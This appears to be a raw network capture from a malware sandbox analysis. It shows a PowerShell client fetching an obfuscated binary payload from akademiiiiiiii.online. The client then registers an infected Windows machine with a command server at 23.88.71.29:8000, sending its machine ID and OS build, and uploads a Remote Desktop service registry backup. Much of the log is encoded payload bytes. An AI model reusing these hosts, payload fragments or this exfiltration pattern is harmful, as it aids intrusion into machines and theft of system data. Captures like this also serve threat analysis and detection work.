Dec 19, 2024 14:24:11.041491032 CET	1289	IN	Data Raw: 82 38 01 74 00 c2 49 8a d1 e8 d1 0e 1c 01 49 8c 04 a8 df 68 01 49 8a 01 49 8c 0c 26 c2 3a 01 49 82 38 01 74 00 c2 49 8a d1 e8 b1 0e 1c 01 49 8c 04 b0 df 68 01 49 8a 01 49 8c 0c 0e c2 3a 01 49 82 38 01 74 00 c2 49 8a d1 e8 91 0e 1c 01 49 8c 04 98 Data Ascii: 8tIIhII&:I8tIIhII:I8tIIhII:I8tIqIhII:I8tIQIhII:I8tI1IhII:I8tIIhII:I8tII
Dec 19, 2024 14:24:19.161484003 CET	292	OUT	POST /3c1ed67e6bcb889b2bab4f8985b0a37595dcd4df24866793b5267ba406479d83bddbd5f177cce8edaf6f54fdb5f26613 HTTP/1.1 Content-Type: application/json User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151 Host: akademiiiiiiii.online Content-Length: 200
Dec 19, 2024 14:24:19.738543987 CET	1013	IN	HTTP/1.1 200 OK Date: Thu, 19 Dec 2024 13:24:19 GMT Content-Length: 0 Connection: keep-alive cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=HTS29brEOzF5dXUhFRssCOj6Gq33ukX5spogoQT9%2B3Jz3aXWUEd8drM1wDxn7HN%2Fck0INtfis49s%2FbsB9krIJwVE8o4jkgbDA5LOYJZfYJqMJnQG32OBn%2BKYbsgSHebCY0a8vDuZQj5N"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=9452&min_rtt=1091&rtt_var=14982&sent=4191&recv=1715&lost=0&retrans=0&sent_bytes=6008476&recv_bytes=5371&delivery_rate=25149592&cwnd=244&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" X-Powered-By: ARR/3.0 Server: cloudflare CF-RAY: 8f47b6543dea677e-ATL server-timing: cfL4;desc="?proto=TCP&rtt=146379&min_rtt=140660&rtt_var=10432&sent=4677&recv=2257&lost=0&retrans=0&sent_bytes=6006349&recv_bytes=1124&delivery_rate=3128599&cwnd=1004&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
Dec 19, 2024 14:24:19.757466078 CET	291	OUT	POST /3c1ed67e6bcb889b2bab4f8985b0a37595dcd4df24866793b5267ba406479d83bddbd5f177cce8edaf6f54fdb5f26613 HTTP/1.1 Content-Type: application/json User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151 Host: akademiiiiiiii.online Content-Length: 97
Dec 19, 2024 14:24:20.337625027 CET	1016	IN	HTTP/1.1 200 OK Date: Thu, 19 Dec 2024 13:24:20 GMT Content-Length: 0 Connection: keep-alive cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ZzC7WJueW1UXtDYmFWpgSeUq7siU%2F2lZ%2FYODT8wpOinxNwlPA7ZuonNWACDRZzEFPLyr23K2pObuN2wK1mE8bOYT55sQZNq2wP%2BDwmlSxPWweuGvs2Mn8li1Bt%2BGszFKNWZJZt%2BmklIA"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=8048&min_rtt=1106&rtt_var=12585&sent=4245&recv=1879&lost=0&retrans=20&sent_bytes=6035192&recv_bytes=4692&delivery_rate=21470588&cwnd=244&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" X-Powered-By: ARR/3.0 Server: cloudflare CF-RAY: 8f47b657fa27677e-ATL server-timing: cfL4;desc="?proto=TCP&rtt=148041&min_rtt=140660&rtt_var=11149&sent=4680&recv=2259&lost=0&retrans=0&sent_bytes=6007362&recv_bytes=1512&delivery_rate=3128599&cwnd=1004&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
Dec 19, 2024 14:24:21.686300993 CET	291	OUT	POST /3c1ed67e6bcb889b2bab4f8985b0a37595dcd4df24866793b5267ba406479d83bddbd5f177cce8edaf6f54fdb5f26613 HTTP/1.1 Content-Type: application/json User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151 Host: akademiiiiiiii.online Content-Length: 64
Dec 19, 2024 14:24:22.262947083 CET	1019	IN	HTTP/1.1 200 OK Date: Thu, 19 Dec 2024 13:24:22 GMT Content-Length: 0 Connection: keep-alive cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=7Qtld%2F8gVEe878CNA1NKeeMuVZzxwRgRD5kgVztVC6ZQHYdg1RDy6l0wGDUYBS4HMYHw26ILESU%2B97%2Ftrnke7qb%2F8Ko7%2Boa1Dng2%2FoKMXnT1Uv4lKCl19N01WCL3RPdjW73cbmUU7RWJ"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=19096&min_rtt=1106&rtt_var=26110&sent=4251&recv=1885&lost=0&retrans=20&sent_bytes=6036747&recv_bytes=6397&delivery_rate=21470588&cwnd=244&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" X-Powered-By: ARR/3.0 Server: cloudflare CF-RAY: 8f47b6640ecf677e-ATL server-timing: cfL4;desc="?proto=TCP&rtt=153012&min_rtt=140660&rtt_var=18302&sent=4683&recv=2262&lost=0&retrans=0&sent_bytes=6008378&recv_bytes=1867&delivery_rate=3128599&cwnd=1004&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"

Timestamp	Bytes transferred	Direction	Data
Dec 19, 2024 14:24:34.510647058 CET	177	OUT	GET /t/46d578f8ebeb0d298af9e0abba20aa6630bf759e378b0ee836f8ea55b25f08ca80e36c8f3c85f8f090ed84d188970ebb9376096bba1965529122fe3306bc0716 HTTP/1.1 Host: akademiiiiiiii.online
Dec 19, 2024 14:24:35.230040073 CET	1289	IN	HTTP/1.1 200 OK Date: Thu, 19 Dec 2024 13:24:35 GMT Content-Type: application/octet-stream Content-Length: 9429504 Connection: keep-alive Cache-Control: no-store,no-cache Pragma: no-cache content-disposition: attachment; filename=image; filename*=UTF-8''image cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=SAxAT9Vw4rQ%2FlLFBARRNtCOHFwM%2FIzhaoDdPWaA%2ByVafuy2gAbKLGgK69KlrVi6YBXC%2BhqhERC9Wd7xzhOr1KYNdF86%2BiRXNlqy0YQG3sZeJ%2B6%2FfjkdIZ44eyZ4P1GHvcZfrWWjJUYhy"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=24517&min_rtt=1095&rtt_var=28134&sent=3571&recv=1533&lost=0&retrans=8&sent_bytes=5070776&recv_bytes=16349&delivery_rate=33664420&cwnd=228&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" X-Powered-By: ARR/3.0 Server: cloudflare CF-RAY: 8f47b6b42940c002-ATL server-timing: cfL4;desc="?proto=TCP&rtt=140710&min_rtt=140710&rtt_var=70355&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=177&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 4c 5b 91 01 02 01 01 01 05 01 01 01 fe fe 01 01 b9 01 01 01 01 01 01 01 41 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 00 01 01 0f 1e bb 0f 01 b5 08 cc 20 b9 00 4d cc 20 55 69 68 72 21 71 73 6e 66 73 60 6c 21 62 60 6f 6f 6e 75 21 63 64 21 73 74 6f 21 68 6f 21 45 4e 52 21 6c 6e 65 64 2f Data Ascii: L[A M Uihr!qsnfs`l!b`oonu!cd!sto!ho!ENR!lned/
Dec 19, 2024 14:24:35.230050087 CET	1289	IN	Data Raw: 0c 0c 0b 25 01 01 01 01 01 01 01 ef ec 37 21 ab 8d 59 72 ab 8d 59 72 ab 8d 59 72 a2 f5 ca 72 a5 8d 59 72 db 0c 58 73 bc 8d 59 72 ab 8d 58 72 2d 8c 59 72 bb 09 5a 73 b8 8d 59 72 bb 09 5d 73 92 8d 59 72 e3 08 5c 73 a8 8d 59 72 db 0c 5d 73 a9 8d 59 Data Ascii: %7!YrYrYrrYrXsYrXr-YrZsYr]sYr\sYr]sYrYrYr\sYrYsYr[sYrShbiYrQDeYf#(?Q@AAa
Dec 19, 2024 14:24:35.230057955 CET	1289	IN	Data Raw: 59 01 49 8c 0c a8 8e 59 01 49 82 38 01 74 00 c2 49 8a d1 e8 0b d8 29 01 49 8c 04 aa 8e 59 01 49 8c 0c 9d 8e 59 01 49 82 38 01 74 00 c2 49 8a d1 e8 ec d9 29 01 49 8c 04 9f 8e 59 01 49 8c 0c 8e 8e 59 01 49 82 38 01 74 00 c2 49 8a d1 e8 d1 d9 29 01 Data Ascii: YIYI8tI)IYIYI8tI)IYIYI8tI)IYIYI8tI)IYIYI8tI)IYIYI8tIx)IYIYI8tI])IYIYI8tI>)IYIYI
Dec 19, 2024 14:24:35.230293989 CET	1289	IN	Data Raw: 74 00 c2 49 8a d1 e8 0f d5 29 01 49 8c 04 d6 90 59 01 49 8c 0c c9 90 59 01 49 82 38 01 74 00 c2 49 8a d1 e8 f0 d2 29 01 49 8c 04 cb 90 59 01 49 8c 0c ba 90 59 01 49 82 38 01 74 00 c2 49 8a d1 e8 d5 d2 29 01 49 8c 04 c4 90 59 01 49 8c 0c b7 90 59 Data Ascii: tI)IYIYI8tI)IYIYI8tI)IYIYI8tI)IYIYI8tI)IYIYI8tI\|)IYIYI8tIa)IYIYI8tIB)IYIYI8tI')
Dec 19, 2024 14:24:35.230303049 CET	861	IN	Data Raw: 04 72 95 59 01 49 8c 0c 65 95 59 01 49 82 38 01 74 00 c2 49 8a d1 e8 f4 cf 29 01 49 8c 04 67 95 59 01 49 8c 0c 56 95 59 01 49 82 38 01 74 00 c2 49 8a d1 e8 d9 cf 29 01 49 8c 04 58 95 59 01 49 8c 0c 4b 95 59 01 49 82 38 01 74 00 c2 49 8a d1 e8 ba Data Ascii: rYIeYI8tI)IgYIVYI8tI)IXYIKYI8tI)IMYI<YI8tI)IFYI9YI8tI)IYIrYI8tIe)IYIYI8tIF)IYIxYI8tI+)IzII
Dec 19, 2024 14:24:35.460047007 CET	1289	IN	Data Raw: c2 49 8a d1 e8 8b ca 29 01 49 8c 04 9a 0f a7 01 49 8a 01 49 8c 0c 90 83 59 01 49 82 38 01 74 00 c2 49 8a d1 e8 6b ca 29 01 49 8c 04 8a 0f a7 01 49 8a 01 49 8c 0c 78 83 59 01 49 82 38 01 74 00 c2 49 8a d1 e8 4b ca 29 01 49 8c 04 72 0f a7 01 49 8a Data Ascii: I)IIIYI8tIk)IIIxYI8tIK)IrIIpYI8tI+)IzIIpYI8tI)IbII`YI8tI)IbII@YI8tI)IJII(YI8tI)I2I
Dec 19, 2024 14:24:35.460138083 CET	1289	IN	Data Raw: 49 8c 04 22 0d a7 01 49 8a 01 49 8c 0c e0 81 59 01 49 82 38 01 74 00 c2 49 8a d1 e8 6b c7 29 01 49 8c 04 12 0d a7 01 49 8a 01 49 8c 0c d8 81 59 01 49 82 38 01 74 00 c2 49 8a d1 e8 4b c7 29 01 49 8c 04 fa 0a a7 01 49 8a 01 49 8c 0c c0 81 59 01 49 Data Ascii: I"IIYI8tIk)IIIYI8tIK)IIIYI8tI+)IIIYI8tI)IIIYI8tI)IIIYI8tI)IIIxYI8tI)III`YI
Dec 19, 2024 14:24:35.460365057 CET	1289	IN	Data Raw: 01 49 8c 0c 30 7f 59 01 49 82 38 01 74 00 c2 49 8a d1 e8 6b c0 29 01 49 8c 04 7a 08 a7 01 49 8a 01 49 8c 0c 28 7f 59 01 49 82 38 01 74 00 c2 49 8a d1 e8 4b c0 29 01 49 8c 04 62 08 a7 01 49 8a 01 49 8c 0c 10 7f 59 01 49 82 38 01 74 00 c2 49 8a d1 Data Ascii: I0YI8tIk)IzII(YI8tIK)IbIIYI8tI+)IbIIYI8tI)IbIIYI8tI)IJIIYI8tI)I:IIYI8tI)I*IIYI8tI
Dec 19, 2024 14:24:35.460375071 CET	1289	IN	Data Raw: 82 38 01 74 00 c2 49 8a d1 e8 6b bd 29 01 49 8c 04 d2 07 a7 01 49 8a 01 49 8c 0c 60 7c 59 01 49 82 38 01 74 00 c2 49 8a d1 e8 4b bd 29 01 49 8c 04 c2 07 a7 01 49 8a 01 49 8c 0c 68 7c 59 01 49 82 38 01 74 00 c2 49 8a d1 e8 2b bd 29 01 49 8c 04 aa Data Ascii: 8tIk)III`\|YI8tIK)IIIh\|YI8tI+)IIIP\|YI8tI)III8\|YI8tI)IzII \|YI8tI)IrII\|YI8tI)IbII}YI8tI)IJ
Dec 19, 2024 14:24:35.460382938 CET	1289	IN	Data Raw: e8 6b b6 29 01 49 8c 04 f2 04 a7 01 49 8a 01 49 8c 0c 60 7b 59 01 49 82 38 01 74 00 c2 49 8a d1 e8 4b b6 29 01 49 8c 04 da 04 a7 01 49 8a 01 49 8c 0c 48 7b 59 01 49 82 38 01 74 00 c2 49 8a d1 e8 2b b6 29 01 49 8c 04 d2 04 a7 01 49 8a 01 49 8c 0c Data Ascii: k)III`{YI8tIK)IIIH{YI8tI+)III0{YI8tI)III {YI8tI)III{YI8tI)IIIxYI8tI)IrIIxYI8tI)IZII
Dec 19, 2024 14:24:35.460475922 CET	1289	IN	Data Raw: 03 a7 01 49 8a 01 49 8c 0c 10 76 59 01 49 82 38 01 74 00 c2 49 8a d1 e8 4b b3 29 01 49 8c 04 ba 03 a7 01 49 8a 01 49 8c 0c f8 77 59 01 49 82 38 01 74 00 c2 49 8a d1 e8 2b b3 29 01 49 8c 04 a2 03 a7 01 49 8a 01 49 8c 0c 08 76 59 01 49 82 38 01 74 Data Ascii: IIvYI8tIK)IIIwYI8tI+)IIIvYI8tI)IIIwYI8tI)IIIwYI8tI)IIIwYI8tI)IrIIwYI8tI)IbIIwYI8t

Timestamp	Bytes transferred	Direction	Data
Dec 19, 2024 14:24:50.236608028 CET	164	OUT	GET /client/ws HTTP/1.1 Host: 23.88.71.29:8000 Connection: Upgrade Upgrade: websocket Sec-WebSocket-Key: YoU7CJ8D9UuIg5OcyVAhnQ== Sec-WebSocket-Version: 13
Dec 19, 2024 14:24:51.039803982 CET	842	IN	HTTP/1.1 101 Switching Protocols Upgrade: Websocket Server: Microsoft-IIS/8.5 Sec-Websocket-Accept: KnrFrF58nHOuh5gjUu/jDGt9U/Y= cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2B1THzX6JOj6xXVVRfMxWrRU94wBkIeEmP%2FcDlKkUf41vGOBDs9u%2BD69aTIrw%2FpKIVriF1V2H3JJi0C5WVOvyj%2FM9Acf3LpVPsL5LqlG%2F8AtAkV9vdJVulkA6jsHb7GCIDSDVaDT81i5I"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} CF-RAY: 8f47b716dad8d38e-FRA alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=5460&min_rtt=5460&rtt_var=2730&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=308&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" X-Powered-By: ARR/3.0 Connection: Upgrade Date: Thu, 19 Dec 2024 13:24:50 GMT

Timestamp	Bytes transferred	Direction	Data
Dec 19, 2024 14:24:54.436415911 CET	234	OUT	POST /api/registry HTTP/1.1 Host: 23.88.71.29:8000 Connection: Keep-Alive Content-Type: application/json Content-Length: 102 Data Raw: 22 45 37 38 35 43 39 38 31 31 35 46 36 41 45 43 30 46 46 43 35 33 35 31 35 45 32 31 39 30 33 31 45 7c 4d 69 63 72 6f 73 6f 66 74 20 57 69 6e 64 6f 77 73 20 31 30 20 50 72 6f 7c 31 30 2e 30 2e 31 39 30 34 32 20 4e 2f 41 20 42 75 69 6c 64 20 31 39 30 34 32 2d 31 30 2e 30 2e 31 39 30 34 31 2e 31 30 38 31 22 Data Ascii: "E785C98115F6AEC0FFC53515E219031E\|Microsoft Windows 10 Pro\|10.0.19042 N/A Build 19042-10.0.19041.1081"
Dec 19, 2024 14:24:55.277708054 CET	803	IN	HTTP/1.1 200 OK Content-Type: text/html Server: Microsoft-IIS/8.5 cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=nUDSmxugwggFdymrwDav4jqiDyq9%2FY0xuBJuAtAQYs7XD9jaJNFTWJBHsp8uyyV6fMhF6BicwEdqHQh3X%2FJ%2FyRgPNKyIR1jmmPQ6HmdbBAorvuWV1XDbjNYcA98TbsD41lUbLOO3oKa8"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} CF-RAY: 8f47b7311ced9f28-FRA alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=5327&min_rtt=5327&rtt_var=2663&sent=2&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=381&delivery_rate=0&cwnd=236&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" X-Powered-By: ARR/3.0 Date: Thu, 19 Dec 2024 13:24:54 GMT Content-Length: 32 Data Raw: 31 31 62 34 36 65 62 39 63 64 64 38 31 61 64 34 63 35 38 37 35 33 36 37 65 65 34 63 30 35 65 34 Data Ascii: 11b46eb9cdd81ad4c5875367ee4c05e4

Timestamp	Bytes transferred	Direction	Data
Dec 19, 2024 14:24:55.531419039 CET	1289	OUT	POST /api/registry/upload/11b46eb9cdd81ad4c5875367ee4c05e4 HTTP/1.1 Host: 23.88.71.29:8000 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=---------------------8dd20069db638ef Content-Length: 5689 Data Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 32 30 30 36 39 64 62 36 33 38 65 66 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 72 65 67 42 61 63 6b 75 70 2e 72 65 67 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6f 63 74 65 74 2d 73 74 72 65 61 6d 0d 0a 0d 0a ff fe 57 00 69 00 6e 00 64 00 6f 00 77 00 73 00 20 00 52 00 65 00 67 00 69 00 73 00 74 00 72 00 79 00 20 00 45 00 64 00 69 00 74 00 6f 00 72 00 20 00 56 00 65 00 72 00 73 00 69 00 6f 00 6e 00 20 00 35 00 2e 00 30 00 30 00 0d 00 0a 00 0d 00 0a 00 5b 00 48 00 4b 00 45 00 59 00 5f 00 4c 00 4f 00 43 00 41 00 4c 00 5f 00 4d 00 41 00 43 00 48 00 49 00 4e 00 45 00 5c 00 53 00 59 00 53 00 54 00 45 00 4d 00 5c 00 43 00 75 00 72 00 72 00 65 00 6e 00 74 00 43 00 6f 00 6e 00 74 00 72 00 6f 00 6c 00 53 00 65 00 74 00 5c 00 53 00 65 00 72 00 76 00 69 00 63 00 65 [TRUNCATED] Data Ascii: -----------------------8dd20069db638efContent-Disposition: form-data; name="file"; filename="regBackup.reg"Content-Type: application/octet-streamWindows Registry Editor Version 5.00[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermService]"DependOnService"=hex(7):52,00,50,00,43,00,53,00,53,00,00,00,00,00"Description"="@%SystemRoot%\\System32\\termsrv.dll,-267""DisplayName"="@%SystemRoot%\\System32\\termsrv.dll,-268""ErrorControl"=dword:00000001"FailureActions"=hex:80,51,01,00,00,00,00,00,00,00,00,00,03,00,00,00,14,00,00,\ 00,01,00,00,00,60,ea, [TRUNCATED]
Dec 19, 2024 14:24:56.015172005 CET	837	IN	HTTP/1.1 200 OK Content-Type: text/plain; charset=utf-8 Server: Microsoft-IIS/8.5 cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=WTags3wlTC%2FZba5ItBg45fXP6eEJvDQH%2FYR4otMw5SRGEMhUGVj9RW0j3vWG6mU1wVOu8r25UmzaesBpwld1WdaMV00JsqH6Y%2FuudJ5QtZw96GcdGMKeRWVqKm6w0lKVRFs9aC4l6P7M"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} CF-RAY: 8f47b737ea9f9f28-FRA alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=5336&min_rtt=5327&rtt_var=2017&sent=8&recv=11&lost=0&retrans=0&sent_bytes=816&recv_bytes=6480&delivery_rate=540340&cwnd=238&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" X-Powered-By: ARR/3.0 Date: Thu, 19 Dec 2024 13:24:54 GMT Content-Length: 41 Data Raw: 46 69 6c 65 20 72 65 67 42 61 63 6b 75 70 2e 72 65 67 20 75 70 6c 6f 61 64 65 64 20 73 75 63 63 65 73 73 66 75 6c 6c 79 2e Data Ascii: File regBackup.reg uploaded successfully.

Timestamp	Bytes transferred	Direction	Data
2024-12-19 13:23:47 UTC	232	OUT	GET /t/6def67bd58318a59383bb069395b497b13b1ee3bc393b8cf83656c4cd7d23351 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151 Host: akademiiiiiiii.online Connection: Keep-Alive
2024-12-19 13:23:48 UTC	1159	IN	HTTP/1.1 200 OK Date: Thu, 19 Dec 2024 13:23:48 GMT Content-Type: application/octet-stream Content-Length: 5644 Connection: close Cache-Control: no-store,no-cache Pragma: no-cache content-disposition: attachment; filename=image; filename*=UTF-8''image cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=q1Go0mfyb6bhptkaCJwADcDKBHnTvt8nPMkCF4P12kwewbG7N9d5BgZb0bu8cRr%2FaNQLP3cvGwFRCsAgJw9OCsUMTtnuKORUE%2FmqCo9LhkMegMPCz%2Bp1jpLNyUPhguVSu4SsYhkS%2FhLZ"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=21534&min_rtt=1002&rtt_var=29232&sent=25&recv=25&lost=0&retrans=0&sent_bytes=14095&recv_bytes=6926&delivery_rate=6576576&cwnd=257&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" X-Powered-By: ARR/3.0 Server: cloudflare CF-RAY: 8f47b5913d8b53aa-ATL server-timing: cfL4;desc="?proto=TCP&rtt=141229&min_rtt=141178&rtt_var=29868&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2857&recv_bytes=846&delivery_rate=27093&cwnd=252&unsent_bytes=0&cid=2c72509799a93a42&ts=883&x=0"
2024-12-19 13:23:48 UTC	210	IN	Data Raw: 25 6c 63 76 70 65 6e 6d 62 3c 5a 52 78 72 75 64 6c 2f 55 64 79 75 2f 44 6f 62 6e 65 68 6f 66 5c 3b 3b 40 52 42 48 48 2f 46 64 75 52 75 73 68 6f 66 29 5a 52 78 72 75 64 6c 2f 42 6e 6f 77 64 73 75 5c 3b 3b 47 73 6e 6c 43 60 72 64 37 35 52 75 73 68 6f 66 29 23 50 55 6d 4b 50 30 48 78 56 57 65 35 4c 57 71 54 62 31 34 45 60 54 47 6f 52 54 4f 43 60 33 53 58 52 6f 43 4b 53 45 43 6f 52 56 30 6e 4c 46 53 48 50 55 5b 4c 64 55 6d 6e 58 55 4b 46 60 30 71 59 4c 59 43 69 57 33 79 76 58 57 65 72 62 46 47 55 4f 59 5b 68 63 59 69 76 58 6c 30 57 65 6a 31 78 55 59 69 60 57 30 44 78 55 6b 4b 57 4c 6d 6d 75 55 6c 6d 51 53 46 62 30 56 56 71 4a Data Ascii: %lcvpenmb<ZRxrudl/Udyu/Dobnehof\;;@RBHH/FduRushof)ZRxrudl/Bnowdsu\;;GsnlC`rd75Rushof)#PUmKP0HxVWe5LWqTb14E`TGoRTOC`3SXRoCKSECoRV0nLFSHPU[LdUmnXUKF`0qYLYCiW3yvXWerbFGUOY[hcYivXl0Wej1xUYi`W0DxUkKWLmmuUlmQSFb0VVqJ
2024-12-19 13:23:48 UTC	1369	IN	Data Raw: 60 57 6d 59 52 55 43 60 60 6c 62 30 55 31 53 56 60 54 30 49 53 59 71 4e 64 6d 54 30 55 6d 65 52 60 6d 71 44 54 6c 75 60 60 6a 6a 76 55 31 53 5b 4c 6a 34 37 60 32 71 5b 60 6d 57 34 55 6c 71 6a 60 57 6d 54 54 59 65 4e 60 6d 44 7b 55 30 65 53 4f 44 30 37 57 6c 75 5b 57 31 54 31 56 56 71 5b 4f 47 6a 78 53 59 65 4f 4c 6d 57 37 56 57 53 60 63 44 38 54 53 6c 30 51 53 31 5b 75 56 6d 65 4b 64 6a 38 54 5b 32 65 4e 57 30 44 31 52 56 71 7b 55 6a 4f 71 50 56 65 4b 50 31 48 76 58 33 34 73 55 6a 4f 71 50 56 65 4b 50 31 47 6f 52 54 4f 43 5b 33 57 32 4c 44 75 4b 50 31 47 6f 52 54 4f 43 5b 31 6d 45 50 56 65 4b 50 31 47 6f 52 6a 65 4a 65 6d 71 48 60 33 65 50 54 31 47 73 58 6a 62 34 63 6d 53 59 57 6f 71 6b 4c 6a 5b 74 56 6d 69 4f 5b 33 5b 45 50 6a 53 68 4c 6b 54 78 56 6d 69 Data Ascii: `WmYRUC``lb0U1SV`T0ISYqNdmT0UmeR`mqDTlu``jjvU1S[Lj47`2q[`mW4Ulqj`WmTTYeN`mD{U0eSOD07Wlu[W1T1VVq[OGjxSYeOLmW7VWS`cD8TSl0QS1[uVmeKdj8T[2eNW0D1RVq{UjOqPVeKP1HvX34sUjOqPVeKP1GoRTOC[3W2LDuKP1GoRTOC[1mEPVeKP1GoRjeJemqH`3ePT1GsXjb4cmSYWoqkLj[tVmiO[3[EPjShLkTxVmi
2024-12-19 13:23:48 UTC	1369	IN	Data Raw: 62 6e 65 68 6f 66 5c 3b 3b 40 52 42 48 48 2f 46 64 75 52 75 73 68 6f 66 29 5a 52 78 72 75 64 6c 2f 42 6e 6f 77 64 73 75 5c 3b 3b 47 73 6e 6c 43 60 72 64 37 35 52 75 73 68 6f 66 29 23 52 6a 69 56 64 56 47 55 50 55 6d 4b 50 31 71 77 5b 44 69 52 65 31 38 71 4e 49 5b 5b 57 32 53 6e 56 6a 65 56 65 46 47 59 63 49 43 69 57 33 79 76 58 57 65 73 65 56 48 78 4f 59 4f 69 57 7b 57 72 55 45 4f 53 65 6a 34 75 56 55 47 5b 60 6a 6a 31 56 6c 71 57 4c 6a 34 37 56 59 69 51 53 31 71 71 55 6b 4b 4b 4c 44 38 49 54 6c 71 4f 57 46 69 6e 55 56 30 4b 4c 54 34 37 57 59 69 60 60 6d 54 7b 55 30 53 46 60 44 30 44 54 6c 6d 5b 57 31 30 34 55 6f 71 5b 4c 47 6d 75 57 59 71 5b 64 6c 69 72 56 57 65 53 4c 54 30 44 58 7b 57 4e 63 57 57 37 56 6c 71 4b 64 6d 71 49 53 6c 71 5b 60 6c 62 79 56 6d Data Ascii: bnehof\;;@RBHH/FduRushof)ZRxrudl/Bnowdsu\;;GsnlC`rd75Rushof)#RjiVdVGUPUmKP1qw[DiRe18qNI[[W2SnVjeVeFGYcICiW3yvXWeseVHxOYOiW{WrUEOSej4uVUG[`jj1VlqWLj47VYiQS1qqUkKKLD8ITlqOWFinUV0KLT47WYi``mT{U0SF`D0DTlm[W104Uoq[LGmuWYq[dlirVWeSLT0DX{WNcWW7VlqKdmqISlq[`lbyVm
2024-12-19 13:23:48 UTC	1369	IN	Data Raw: 52 78 72 75 64 6c 2f 55 64 79 75 2f 44 6f 62 6e 65 68 6f 66 5c 3b 3b 40 52 42 48 48 2f 46 64 75 52 75 73 68 6f 66 29 5a 52 78 72 75 64 6c 2f 42 6e 6f 77 64 73 75 5c 3b 3b 47 73 6e 6c 43 60 72 64 37 35 52 75 73 68 6f 66 29 23 62 32 53 6d 63 52 34 4f 58 56 34 69 5b 33 57 75 5b 56 34 31 4d 6a 47 30 65 46 38 75 58 59 53 71 63 33 35 74 57 49 4b 69 58 33 6d 74 5b 78 34 50 54 31 57 31 65 31 79 77 5b 30 43 78 63 32 5b 71 5b 46 57 78 23 28 28 3a 0b 25 77 72 66 70 62 3c 5a 52 78 72 75 64 6c 2f 55 64 79 75 2f 44 6f 62 6e 65 68 6f 66 5c 3b 3b 40 52 42 48 48 2f 46 64 75 52 75 73 68 6f 66 29 5a 52 78 72 75 64 6c 2f 42 6e 6f 77 64 73 75 5c 3b 3b 47 73 6e 6c 43 60 72 64 37 35 52 75 73 68 6f 66 29 23 54 32 6a 3c 23 28 28 3a 0b 25 6a 72 73 70 72 75 3c 5a 52 78 72 75 64 